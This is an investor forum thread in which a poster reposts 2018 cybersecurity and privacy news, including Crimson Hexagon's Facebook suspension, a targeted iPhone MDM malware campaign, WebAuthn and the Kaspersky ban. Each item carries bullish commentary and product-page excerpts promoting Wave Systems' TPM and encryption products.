Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Great, Now Facebook Is Investigating Potential Data Misuse by Something Called 'Crimson Hexagon'
Wave's Scrambls could have benefited Facebook and Twitter users in a big way. It could be a great tool for Facebook and Twitter users to 'scrambl' posts for the public that is not part of their inner circle. imo.
https://gizmodo.com/great-now-facebook-is-investigating-potential-data-mis-1827773950
Facebook may have stumbled through its Cambridge Analytica user privacy scandal largely unscathed so far—the yet-to-be-determined outcome of four separate federal investigations notwithstanding—but its pivot to publicly talking a big game on cracking down on data misuse continues.
Now Facebook has suspended another data analysis firm that received user data, this time with a name that sounds suspiciously like an evil corporation from a 1980s-era Kurt Russell movie: Crimson Hexagon. According to the Wall Street Journal, the company has secured at least 22 separate federal contracts since 2014 worth more than $800,000, including for the State Department, the Federal Emergency Management Agency, and the Secret Service, as well as a separate contract with a Russian nonprofit called the Civil Society Development Foundation.
Crimson Hexagon aggregates large amounts of public posts from sites like Facebook and Twitter for purposes like measuring public sentiment around a range of issues, and according to the WSJ, claims to have assembled a trillion-post archive. For example, the paper reported it attempted (but failed) to procure a Defense Department contract monitoring the terror group ISIS online. Its Russian contract was to measure the popularity of Vladimir Putin; another contract in Turkey informed the Recep Tayyip Erdogan-led government’s “decision in 2014 to briefly shut down Twitter amid public dissent,” the WSJ wrote, citing sources familiar with the company.
While the WSJ wrote Facebook is suspending the Boston-based company while it determines whether the government contracts violated its terms, it is not currently believed the firm gained access to private data like Cambridge Analytica:
Crimson Hexagon operates with little oversight from Facebook once it pulls public data from the social-media platform, according to more than a dozen people familiar with the business. The government contracts weren’t approved by Facebook in advance, for example, the people said.
Facebook, in response to questions from The Wall Street Journal this week about its oversight of Crimson Hexagon’s government contracts and storing of user data, said Friday it wasn’t aware of some of the contracts. On Friday, it said it was suspending Crimson Hexagon’s apps from Facebook and its Instagram unit, and launching a broad inquiry into how Crimson Hexagon collects, shares and stores user data.
Also concerning is a 2016 incident in which Crimson Hexagon suddenly began receiving private Instagram posts while downloading public Facebook ones “because of what Crimson Hexagon employees assumed was a software glitch on Facebook’s part”—something that certainly sounds like a major screwup.
Twitter also worked with Crimson Hexagon, the paper wrote. Unlike with Facebook, where data is freely provided to developers, the company paid Twitter for direct access to its “fire hose,” a premium version of its API that guarantees access to all tweets matching specific criteria. That means Crimson Hexagon gets more useful data from Twitter than Facebook, the WSJ added, but Twitter reportedly killed a potential contract with Immigration and Customs Enforcement over concerns on how the data might be used.
Facebook banned the use of its data for government surveillance in March 2017, per the BBC, though Crimson Hexagon’s other deals have included work with Adidas, Samsung, and the BBC itself.
“We don’t allow developers to build surveillance tools using information from Facebook or Instagram,” a Facebook spokesperson told CNN Money. “We take these allegations seriously, and we have suspended these apps while we investigate.”
In a blog post, Crimson Hexagon’s Chris Bingham emphasized that the company only pulls public posts, that government contracts are a minority of its work, that it only uses the data for purposes allowed by platforms, and “under no circumstances is surveillance a permitted use case.”
As noted by TechCrunch, unlike Cambridge Analytica, which worked to obfuscate its connection to a shady network of other companies and allegedly hired foreign contractors to work on US elections in what was possibly an illegal scheme, “Crimson Hexagon is more above the board, with ordinary venture investment and partnerships.”
Mysterious malware campaign targets just 13 iphones in India
Can there be any doubt that this has occurred or will occur on Android phones as well? Wave Endpoint Monitor could potentially help out in this situation. imo. see previous post below.
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=142196498
https://www.cyberscoop.com/mysterious-malware-campaign-targets-just-13-iphones-india/
An application-warping malware campaign in India is aimed at just 13 iPhones in what researchers are calling a “highly targeted” operation.
The attackers are using an open-source mobile device management (MDM) server to distribute the malware through popular apps like Telegram and WhatsApp, researchers from Talos, Cisco’s threat intelligence unit, revealed Thursday. The use of MDM, a popular enterprise tool for administering mobile apps, allows hackers to control how their malware is interacting with the target phones.
“This campaign is of note since the malware goes to great lengths to replace specific mobile apps for data interception,” researchers Warren Mercer, Paul Rascagneres, and Andrew Williams wrote in a blog post.
The researchers don’t know who was targeted in the campaign, who carried out the attack, or why. While the hackers apparently tried to plant a “false flag” by posing as Russian, evidence suggests they were operating in India, according to Talos.
The malicious code injected into the apps can collect and exfiltrate phone and serial numbers, location, contacts, and Telegram and WhatsApp messages. The iPhone users are likely lured into enrolling in the MDM service through a social engineering campaign, according to the researchers. Each step of the enrollment process requires interacting with the user, such as installing a certificate authority on the iPhone.
Apple has revoked 5 certificates linked with the campaign, according to the researchers.
“The likely use of social engineering to recruit devices serves as a reminder that users need to be wary of clicking on unsolicited links and verify identities and legitimacy of requests to access devices,” they wrote.
The growing use of MDM at large organizations means users need to understand that installing additional certificates on devices can expose them to malicious activity, the researchers advised. “By installing a certificate outside of the Apple iOS trusted certificate chain, you may open up to possible third-party attacks like this,” they added.
It’s an open question as to why the malware, which the researchers say has been in use since August 2015, has gone after just 13 iPhones. Asked about this, a Talos spokesperson said that, for now, the researchers won’t be offering additional information beyond the blog post.
“Over a three-year period, the attackers remained under the radar — likely due to the low number of compromised devices,” the blog post states.
Pay-n-pray cybersecurity isn’t working. What if we just paid when it works?
https://www.digitaltrends.com/computing/bounty-based-cybersecurity-safety/
Not allowing bad guys on the network (see end of post) compared to the norm could be a relief to companies constantly having to put out fires (and potentially miss some) and be proof that Wave's TPM/ERAS product 'perform as designed'. Other Wave products perform better than competitors in the industry and this article discusses pay for performance which seems to be one of Wave's stronger suits. imo. This could change the way companies buy cybersecurity products. With companies spending billions of dollars on cybersecurity, isn't it time they find solutions that work; like Wave System's products!
Like home security, people would often rather not think about cybersecurity once they’ve paid for it. They’d rather pay and pray.
But how do you know when a security company’s software is working? With all the billions of dollars poured into protecting ourselves and our businesses online, why do hacks seem to be increasing in regularity and damages?
We spoke with Oren J. Falkowitz, a former senior-level employee at the NSA and United States Cyber Command, who has a radical idea for how cybersecurity companies should be making their money.
The problem
Our modern cybersecurity fiasco has many causes. Maybe it’s a lack of government funding and regulation. Maybe it’s large tech corporations not caring enough about privacy. Maybe it’s just a matter of educating the public and explaining in simple terms what’s at stake.
Falkowitz has a different take. He believes the real problem is that cybersecurity profits aren’t tied to performance. “For us, it means performance-based cybersecurity and paying for results, not a failure,” he told Digital Trends. “Companies should pay for cybersecurity only when and if it performs as designed.”
That’s not how it works today. Cybersecurity experts, companies, and antivirus software are presented and purchased like an insurance plan. You pay monthly and hope that nothing bad happens. If it does, they’ll help you pick up the pieces — and maybe try to upsell you on more security.
Area 1 Security, Falkowitz’ own cybersecurity company, takes the opposite approach. Area 1 calls out the fact that people “commit to security contracts running three to five years, spending six or seven figures. But they still don’t get what they pay for.” Falkowitz believes clients should pay only for attempted crimes that are stopped. It’s an idea similar to bug bounty programs, which encourage hackers to find – and then disclose – vulnerabilities
“Companies spend about $93 billion on cybersecurity, with no end in sight, and what’s worse, no end to the severity or frequency of cyber attacks,” Falkowitz said. “Performance-based and accountable cybersecurity will ensure that results are what drive the future innovations and successful outcomes in business models.”
You might wonder how a company could stay in business if it constantly had to prove to customers that attacks are being stopped. Area 1 Security makes it work by focusing its efforts on a particular aspect of cybersecurity — phishing.
It all leads back to phishing
“Phishing is the attack that starts the attack, it’s the root cause for an astounding 95 percent of all damages,” said Falkowitz. “The key to performance-based cybersecurity is stopping phishing.”
Phishing has become the bane of the internet’s existence. From malware to stolen data, phishing is often the entry point for the worst cyberattacks we’ve seen. It usually takes the form of a fraudulent email, sent to an unsuspecting victim under the guise of an official company or organization.
The email will then prompt the reader to click a link — and once they do, the attacker’s trap is triggered. Though simple, hackers have used phishing for everything from the Clinton campaign email debacle to the devastating 2017 WannaCry ransomware attack.
“Phishing is a socially-engineered attack that relies on authenticity to evade detection,” Falkowitz explained. “It’s designed not to be caught by anyone! That’s why it works so well. Besides being effective, it’s also incredibly cheap. That’s part of why it’s so good economically to be a bad guy on the internet. If you’re an attacker and you have something that works, that most companies can’t defend against, why not keep using it?”
Area 1 Security’s system claims to stop 99.99 percent of all phishing attacks, allowing them to keep a log of the attacks they’re preventing. Its philosophy isn’t to hunt down the criminals across the internet, but instead to stop the ones who are already knocking at our doors.
“Until we take phishing as a weapon out of the hands of attackers, we’ll continue on this increasingly dangerous and expensive trajectory.”
Maybe it’s time we started asking more from the companies that claim to protect us. After all, disarming the bad guys sounds like a much better plan than waiting for them to attack.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Microsoft, Google, Facebook, Twitter Announce "Data Transfer Project"
The profiles mentioned in the article could be stored in the TPM and maybe somewhat similar to the OneName/Wave agreement way back in 2000 except TPMs are ubiquitous now. It seems that the 'Trust at the Edge' of the network paradigm could work more effectively in this situation now that TPMs are ubiquitous!
https://www.bleepingcomputer.com/news/technology/microsoft-google-facebook-twitter-announce-data-transfer-project/
Facebook, Google, Microsoft, and Twitter have announced on Friday, July 20, the Data Transfer Project (DTP), an initiative to create an open-source, service-to-service data portability platform so that users of their sites and others can easily migrate data from one platform to another.
After open-sourcing the code, the four tech giants hope that other platforms will adopt their new technology and help create an interconnected web where users can easily move data from platform to platform without headaches and avoid situations where they have to set up profiles over and over and over and over again at each site they register.
But the DTP framework is also useful for other things. For example, the four companies say, it could be leveraged to build tools and software to extract and back up data stored in social media profiles, or for creating tools that wipe out a user's social presence.
DTP leverages existing APIs
According to a scientific paper the four companies working on DTP released yesterday, the DTP framework will work on existing APIs and authorization mechanisms to access data to access and convert data into a common format and will require minimal modifications from participants.
Security features are baked in, and a governance body will also be created to oversee the framework's future development.
The DTP framework's source code is available on GitHub.
DTP already supports a few export types, online platforms
"Our prototype already supports data transfer for several product verticals including: photos, mail, contacts, calendar, and tasks. These are enabled by existing, publicly available APIs from Google, Microsoft, Twitter, Flickr, Instagram, Remember the Milk, and Smugmug," said Brian Willard, Software Engineer and Greg Fair, Product Manager at Google.
"For people on slow or low bandwidth connections, service-to-service portability will be especially important where infrastructure constraints and expense make importing and exporting data to or from the user’s system impractical if not nearly impossible," said Craig Shank, Vice President for Corporate Standards at Microsoft.
"These are the kinds of issues the Data Transfer Project will tackle. The Project is in its early stages, and we hope more organizations and experts will get involved," said Steve Satterfield, Privacy & Public Policy Director at Facebook.
"This will take time but we are very excited to work with innovators and passionate people from other companies to ensure we are putting you first," said Damien Kieran, Data Protection Officer at Twitter.
How Web Authentication May Change the Future of Passwords
Shouldn't Web Authentication or similar products have the premier TPM management company (Wave) and its product ESC/ETS used to help manage the TPM?
https://www.programmableweb.com/news/how-web-authentication-may-change-future-passwords/how-to/2018/07/19
Using WebAuthn or Web Authentication clients can be verified with their phones, hardware keys, or trusted devices. In his article, Nick Steele explains the new standards in web authentication, followed by registration and authentication where you’ll find PIN and biometrics access methods, then he comments how web browsers use a credential manager API.
Web Authentication
Trusted platform module devices that secure hardware through crypto keys and mobile phones are two of the many ways to authenticate via the web. Users can be authorized by fingerprints with biometric verification, although additional bio methods exist like retina and iris patterns, hand geometry, earlobe geometry, voice waves, and DNA. When a customer is accessed via web, passwords no longer will be necessary.
Registration
When a user registers, the created credential confirms to the web app owner that access is granted. This method replaces ordinary U2F cases, in which one security key instantly validates user presence. U2F is used by Facebook, Gmail, Dropbox, Salesforce.com, and GitHub. Think about the times when you’ve confirmed identity to Gmail by entering a number they send you via text message on your phone.
The author clarifies registration with an example: A user visits the website cat-facts.com from a laptop, registering for an account. By pressing the registration button, a prompt on their phone says “Register with cat-facts.com.” When they accept the request, the user could use a PIN or a biometric action (like a fingerprint) that will be linked to the created account. This action will display a confirmation: “Registration complete!” This user is now registered and the system has recorded the authorization gesture for future access.
The same image the author shares makes me think on my phone when I download an app from the App store.
Authentication
The credential created by the user is a keypair, a public key associated to a private key. The device the user is trying to authenticate will send verification data to prove user identity. When the user confirms presence, the data will be returned signed by the credential private key, authenticating the user to the device.
To demonstrate WebAuthn, let’s imagine a user registered a second account at the site example.com and the person is browsing on a phone. As the user types the address example.com, the option to login is chosen and two accounts will be displayed. The user will select the account and then prompted to enter a PIN or a biometric authentication linked to the account.
Credential manager API and… the end of passwords?
WebAuthn aims to provide biometric multi-factor authentication unique, like a fingerprint from a smartphone, voice, or retina. Eye verification would be from a short range distance, although an iris scanner that captures an eye from 40 feet away has been already developed by the Carnegie Mellon University College of Engineering. The idea is to authenticate with particular traits to increase security and replace passwords.
WebAuthn currently only supports two-factor authentication that in most cases include username and password in addition to authentication via smartphone. If a biometric verification is not accessible, entering a PIN can work because still, it will be browser-protected by Google, Microsoft, and Firefox. Verification stored by browsers could be handled by a Credential Manager API that Google uses in Chrome. As W3 defines, the API enables a website to request a user’s credentials from a user agent, helping the user agent correctly store user credentials for future use.
The end of passwords is not near yet. The author predicts Firefox and Google could release the WebAuthn API within the next months.
He has developed a web app in Go hosted on GitHub to demonstrate how WebAuthn registration and authentication work. You can try out the code via webauthn.io, a Firefox Night Build.
https://www.wavesys.com/products/embassy-security-center
This puts the endpoint in endpoint security
A key piece of the Wave alternative, Wave’s EMBASSY® Security Center is what lets you manage all the functions of your Trusted Platform Modules (TPMs) and self-encrypting drives (SEDs)—hardware security features already embedded in most business-class PCs and tablets. When installed on each of your desktops, laptops, tablets, and so on, this feature-rich software carries out the commands you issue remotely with our EMBASSY server products.
Key Features:
Easy security compliance
• When your endpoints are secure and reporting is in place, you’ve got compliance covered
Data protection
• Configure your VPN so that only authorized machines can access it from the outside
• Multi-factor authentication options include any combination of individual passwords, a master password, biometrics, smart cards, or a TPM PKI certificate
• Easy backup and recovery of TPM keys in case of malfunction of the TPM, motherboard, or hard drive
• Enables hardware-based pre-boot authentication to the encrypted hard drive (if equipped)
Simplicity
• Central management of security policies at the machine and user levels via our EMBASSY Remote Administration Server
• Deploy TPMs from multiple manufacturers using a single management system
• Deploy SEDs in minutes that integrate seamlessly with single sign-on (SSO) to Windows and Windows password synchronization
No compromises
• More security without more passwords to remember
• Your devices will perform just the same—our software makes them safer, not slower
Windows 8 Compatibility
• Compatible with Windows 8.1, 8, 7 and Vista operating systems – manage mixed environments from one console
• ESC supports Windows 8 Pro & Enterprise tablets so the same tools can secure all your enterprise endpoints
Application development
• Accelerate your application development, determine compatibility of your application and the TPM by using Wave’s Cryptographic Service Provider or Key Storage Provider, both included with the Embassy Security Center
Only 20% of companies have fully completed their GDPR implementations
https://www.helpnetsecurity.com/2018/07/16/complete-gdpr-implementation/?utm_source=twitter&utm_medium=social&utm_campaign=corpcomms&utm_content=industry-news
Key findings from a survey conducted by Dimensional Research highlight that only 20% of companies surveyed believe they are GDPR compliant, while 53% are in the implementation phase and 27% have not yet started their implementation.
EU (excluding UK) companies are further along, with 27% reporting they are compliant, versus 12% in the U.S. and 21% in the UK. While many companies have significant work to do, 74% expect to be compliant by the end of 2018 and 93% by the end of 2019.
While many companies still have a long way to go, a comparison to August 2017 research shows significant progress in the past ten months. The number of companies whose GDPR implementation is under way or completed increased from 38% to 66% in the U.S. and from 37% to 73% in the UK.
The cost of compliance is high
•27% of companies spent over half a million dollars each to become GDPR compliant
•31% of companies plan to spend over half a million dollars each on GDPR compliance efforts between June and December 2018
•18% of US companies spent over 1 million dollars each on compliance versus 8% for UK and 8% for EU companies.
Most companies are positive about GDPR
Despite difficulties in becoming GDPR compliant, 65% view GDPR as having a positive impact on their business. Only 15% view the GDPR as having a negative impact on their business
Customer expectations and complexity top GDPR drivers
•Meeting customer expectations (57%) was the main driver to become compliant, significantly higher than concern for fines (39%)
•Complexity of GDPR posed the biggest challenge to comply.
GDPR will continue to drive privacy investments
•87% indicate that data privacy will become more important at their companies post the GDPR deadline
•80% of companies plan to increase their spending on GDPR technology and tools to maintain compliance.
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Enterprises choose Wave to manage SEDs
Why? From our single console, you can manage all your organization’s self-encrypting drives (SEDs) easily and remotely, whether they number in the hundreds, or hundreds of thousands.
SEDs are the most secure, best-performing and most transparent encryption option for protecting data on laptops. These drives automatically encrypt all data written to the drive, so you don’t have to decide what’s important enough to encrypt. They also perform this encryption in the hardware of the drive, so you don’t end up with the performance issues software full-disk encryption is infamous for. SEDs are available as HDD or SSD, and are sold by most major drive manufacturers.
Wave’s management solution delivers remote drive initialization, user management, drive locking, user recovery and crypto-erase for all Opal-based, proprietary and solid-state SEDs.
Easy proof of compliance
Your encryption is only as good as you can prove it to be. To comply with most data protection regulations, your organization has to prove encryption was in place at the time of a potential breach. Wave provides secure audit logs to help you demonstrate compliance.
If you lose a device with a Wave-managed SED, there’s no wondering or guessing. You know encryption was on by default, and you can prove it.
No vendor lock-in
SED technology was created and standardized by a consortium of the best in the infosec industry, a standards body called the Trusted Computing Group (TCG). This means you can buy your drives wherever you want, from whatever vendor you want—any SED built to the TCG’s Opal specification can be managed by Wave.
No SEDs yet? No problem.
If your organization hasn’t yet deployed SEDs, you can skip the process of retro-fitting and simply incorporate SEDs on all new laptops as part of your regular refresh cycle. In the meantime, the same Wave console can manage BitLocker and SEDs, so you can protect the devices you have now with BitLocker and add those with SEDs as they are deployed. And if you’re using Wave’s cloud platform, you can also support OSX FileVault2.
Pick your platform
Wave SED management is available via the cloud or on-premise servers. Ask us for more details about which platform is right for your deployment.
https://www.wavesys.com/products/wave-virtual-smart-card
Wave could have a big impact in getting companies GDPR compliant. imo.
If Your Weapons Aren’t Cyber-Hardened, Expect to Lose Pentagon Contracts
https://www.defenseone.com/business/2018/07/if-your-weapons-arent-cyber-hardened-expect-lose-pentagon-contracts/149783/
The Pentagon intends to start assessing its weapons’ resistance to hacks, instead of leaving that to manufacturers.
FARNBOROUGH, UK — The Pentagon could stop awarding contracts to companies whose weapons are deemed vulnerable to cyber attacks, according to senior U.S. Defense Department officials.
Today, companies are responsible for assessing whether their own products meet DoD cybersecurity standards.
“Because of a couple recent events, we realized that that is not good enough,” Kevin Fahey, the assistant secretary of defense for acquisition, said Monday during a briefing at the Farnborough Air Show.
In February, Deputy Defense Secretary Patrick Shanahan issued a stern warning to companies: protect your networks or risk losing business. In June, Chinese hackers allegedly stole sensitive submarine warfare information from a contractor’s computer.
Officials from the Pentagon’s acquisition, intelligence, chief information officer and research-and-engineering offices are creating a way to test the cyber defenses of weapons when assessing bids from companies. The effort is called “Delivered Uncompromised.”
“If you think about our weapon systems today, the IT infrastructure is a part of our weapon system,” Fahey said.
MITRE Corp., a research-and-development firm, conducted a study, which is “the baseline of where we’re starting from,” Fahey said after the briefing.
The MITRE report noted supply chain vulnerabilities, according to a person familiar with its findings, and made a series of recommendations, including making cyber hardening a “fourth pillar” of acquisition, along with cost, schedule and past performance.
The Pentagon has taken a number of steps in recent months to tighten its cyber defenses. In February, the Defense Science Board made a series of recommendations to improve the way the Pentagon buys software. Two months later, Ellen Lord, the undersecretary for acquisition and sustainment, tapped Jeff Boleng — a former Air Force cybersecurity operations officer — as her special assistant for software acquisition. The Pentagon is also assessing the cyber vulnerabilities of its weapons and infrastructure. The efforts are all intertwined, according to a source with insight into the projects.
“We have to develop a way that we evaluate people’s capability in cyber security almost as a go, no-go versus it’s a comparison between cost, schedule and performance and cyber,” Fahey said after the roundtable. “Cost, schedule, performance always end up being one, two and three [in terms of priority] and then if you’re the fourth, you’re not that important.”
Officials are considering using a grading system for cyber standards that similar to the way it assesses the maturity of software. They are also considering creating “red teams” that would test contractors cyber defenses. Another consideration is offering contractors government-certified cyber tools.
“We know it’s really serious now that we need to make that as a priority and then figure out how do we help the small businesses, Fahey said. “One of the ideas is almost us maybe being able to deliver them the IT infrastructure as [government furnished equipment] that is cyber secure. That is a high priority across the department.”
Today companies have to declare that they comply with federal acquisition regulations, “but we really don’t check it,” Fahey said. If a company does not meet the standards, it’s not a condition that could prevent them from being awarded a contract. “You just have to come up with a plan on how you’re going to meet it,” he said.
Officials believe that requiring cyber hardening as part of a weapon competition will force companies to better protect their systems.
“If it becomes a competitive differentiator, then what ends up happening is you’ve got every incentive in the world to meet that standard and to use it because it’s something that you need to be successful,” Eric Chewning, deputy assistant secretary of defense for manufacturing and industrial base policy, said in an interview.
Said Fahey: “The only way you make it serious to industry is you make it part of the competition
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs
Less Than Half of Cyberattacks Detected via Antivirus: SANS
see previous post for relevant information on Wave Endpoint Monitor. With so many companies still using traditional antivirus it would seem that a product like WEM could be just what these companies need.
https://www.darkreading.com/endpoint/less-than-half-of-cyberattacks-detected-via-antivirus-sans/d/d-id/1332309?_mc=KJH-Twitter-2018-07
Companies are buying next-gen antivirus and fileless attack detection tools but few have the resources to use them, researchers report.
Businesses are investing in more advanced endpoint security tools but don't have the means to properly implement and use them, according to a new report from the SANS Institute.
The SANS 2018 Survey on Endpoint Protection and Response polled 277 IT professionals on endpoint security concerns and practices. In this year's survey, 42% of respondents reported endpoint exploits, down from 53% in 2017. However, the number of those who didn't know they had been breached jumped from 10% in 2017 to 20% in 2018.
Traditional tools are no longer sufficient to detect cyberattacks, the data shows: Antivirus systems only detected endpoint compromise 47% of the time; other attacks were caught through automated SIEM alerts (32%) and endpoint detection and response platforms (26%).
Most endpoint attacks are intended to exploit users. More than 50% of respondents reported Web drive-by incidents, 53% pointed to social engineering and phishing attacks, and half cited ransomware. Credential theft was used in 40% of compromises reported, researchers state.
The majority (84%) of endpoint breaches involve more than one device, experts report. Desktops and laptops are still the top devices of concern, but attackers are also compromising server endpoints, cloud-based endpoints, SCADA, and other industrial IoT devices. Cloud-based endpoints are increasingly popular, going from just over 40% in 2017 to 60% in 2018.
Given the commonality and effectiveness of user-targeted attacks, it's worth noting that detection technologies designed to look at user and system behavior, or provide context awareness, were less involved in detecting breaches. Only 23% of breaches were found with attack behavior-modeling and only 11% were detected with behavior analytics.
Businesses aren't using these technologies as often because they lack the means, SANS reports. Many IT and security pros report investing in next-gen capabilities but not installing them. For example, half have acquired next-gen AV tools but 37% have not implemented them. Forty-nine percent have fileless attack detection tools but 38% haven't implemented the tech.
When breaches do occur it seems many businesses can trace them to the source. Nearly 80% of respondents report they can tie a user to endpoints and servers at least half the time (34% always, 45% at least half), which adds an identity when making decisions about user behavior.
Data collection makes a major difference in data breach remediation, but organizations don't always have access to the data they needed. Most (84%) respondents want more network access and user data, 74% want more network security data from firewall/IPS/unified threat management systems, and 69% want better network traffic analysis.
Government’s Kaspersky Ban Takes Effect
The government should look to have a better malware defense by incorporating Wave Endpoint Monitor. imo. Having Kaspersky banned should put more emphasis on using better anti-malware products like WEM. If only the right people really knew about WEM and other Wave products.
https://www.nextgov.com/cybersecurity/2018/07/governments-kaspersky-ban-takes-effect/149758/
Pentagon, GSA and NASA contracts will now officially prohibit Kaspersky software.
A new procurement rule took effect Monday barring the Russian anti-virus company Kaspersky Lab or any of its partners or distributors from contracts at the Pentagon, General Services Administration or NASA, despite a last-minute Kaspersky effort to halt the ban.
Kaspersky told a federal appeals court last week that the ban would cause the company “reputational and financial damage” and asked the court to temporarily halt the ban while it considers Kaspersky’s underlying legal challenge.
The U.S. Court of Appeals for the D.C. Circuit denied that request late Friday. The one-sentence ruling stated Kaspersky had “not satisfied the stringent requirements for an injunction pending appeal.”
The December 2017 congressional ban was sparked by intelligence agencies’ allegation that Kaspersky executives are too closely tied to the Kremlin and the Homeland Security Department’s conclusion that a Russian cybersecurity law might compel Kaspersky to help Russian intelligence agencies spy on the U.S. government.
Kaspersky has consistently denied any undue influence by the Kremlin and said the Homeland Security Department is misreading the Russian law.
Kaspersky told Nextgov in a statement that the company “is disappointed that the appellate court did not grant the company’s motion to stay … but remains hopeful that the court will find the law unconstitutional after full consideration of the case on the merits.”
Kaspersky’s broad legal argument against the U.S. ban is that Congress unfairly singled it out for punishment without sufficient legal process—what’s called a “bill of attainder.” A U.S. district court judge dismissed that claim in May, saying Congress’s goal was to protect national security, not to punish Kaspersky.
That’s the ruling Kaspersky is appealing.
Kaspersky software has already been scrubbed from all civilian government systems because of a separate ban imposed by Homeland Security in October. Government lawyers argued that meant it was pointless to stall the congressional ban because it would have no practical effect.
Kaspersky disputed that claim in its unsuccessful argument to the appeal court. Putting the congressional ban into effect will damage Kaspersky’s reputation—and its U.S. private-sector sales—even if the ban itself doesn’t lose the company any business, the motion said.
Kaspersky and the government are scheduled to make oral arguments in the case in September.
Congress is likely to enact similar governmentwide contracting bans targeting the Chinese companies Huawei and ZTE in the 2019 version of an annual defense policy bill that’s currently being squared away by a House-Senate conference committee.
The White House has proposed legislation that would make such bans easier in both civilian and defense agencies
https://www.wavesys.com/malware-protection
Excerpts:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient 0 that discovers he is infected, for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strand of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs would use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
A further challenge for anti-malware software is that it commonly works at the OS level. It isn’t very good at seeing deeper into the system, where some malware lives. Malware can hide from anti-malware by feeding it false results as it lies lower in the stack.
APT's extent seems wider each week. News stories about targeted attacks on organizations appear weekly. Even more stories do not appear, as some malware is not detected for very long periods of time. Some malware described as "cutting edge" has code components that have been available for 3 and 4 years, thus dating their undetected time of life in the wild. With online tools, even a non-technical person can create one easily. And there are more ways than ever for malware to spread: the Internet, personal computing devices, downloads, email, social media sites. Government agencies recognize it as a growing threat. Early detection is the highest priority in this Cyberwar. In 2011 NIST published guidelines for establishing a chain of trust for the basic input/output system (BIOS), which initializes a computer when it boots up. This critical system is one of malware’s more consequential targets and an area specifically protected by Wave Systems in its products and in its thinking.
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
Which other attack vector should you watch? One common vector that is used to attack even the most secure networks is physical devices – connected to USB, FireWire or SD. Our Data Protection Suite AV scanner allows you to block any unscreened device from connecting to any machine in the organization, until it has been scanned for known malware.
U.S. intelligence chief lays out threats to U.S. infrastructure, efforts to protect it.
The government hasn't opted for 'The Wave alternative as part of its cybersecurity protection and it seems like this is a missing link in its cybersecurity strategy.
https://www.wavesys.com/solutions
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.cyberscoop.com/dan-coats-hudson-institute/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=74346921&utm_medium=social&utm_source=twitter
The top U.S. intelligence official painted a grim picture on Friday of the many types of cyber threats the U.S. faces across critical infrastructure sectors and highlighted the ways the government is countering them.
“These attacks come in different forms. Some are tailored to achieve very tactical goals, while others are implemented for strategic purposes, including the possibility of a crippling cyber attack against our critical infrastructure,” said Director of National Intelligence Dan Coats, speaking at the Hudson Institute, a Washington, D.C. think tank.
“But all of these desperate efforts share a common purpose to exploit America’s openness in order to undermine our long-term competitive advantage.”
Coats said that U.S.’s digital infrastructure is under constant attack from foreign entities including China, Iran and North Korea, but he singled out Russia as the “most aggressive” one, highlighting the country’s reported efforts to use hacking and information campaigns to influence U.S. elections.
The director sought to clarify recent comments from a top DHS official, that suggested that the intelligence community has seen a decline in intent from Russia to interfere in future elections.
“I think there may have been some confusions on what we were seeing now compared to what we saw in 2016 because the Department of Homeland Security noted we are not yet seeing the kind of electoral interference in specific states and in voter databases that we experienced in 2016,” Coats. “We are just one click of the keyboard away from a similar situation repeating itself.”
Coats’ talk took place within hours of the Department of Justice announcing new indictments of 12 Russian intelligence officers for allegedly hacking into the Democratic National Committee and other election-related entities in the run-up to the 2016 election.
But Coats also warned against having tunnel vision focused on the elections, noting that foreign actors continually target other aspects of U.S. critical infrastructure.
“DHS and FBI, in coordination with international partners detected Russian government actors targeting government and businesses in the energy, nuclear, water aviation, and critical manufacturing sectors. the warning signs are there. The system is blinking and it is why I believe we are at a critical point,” he said.
A silver lining that Coats pointed out is that the intelligence community is more integrated and better at sharing information across the 16 agencies that make it up than in past years. However, he said, challenges remain when it comes to coordination between the IC and the private sector organizations that are tapped into the threats U.S. infrastructure faces.
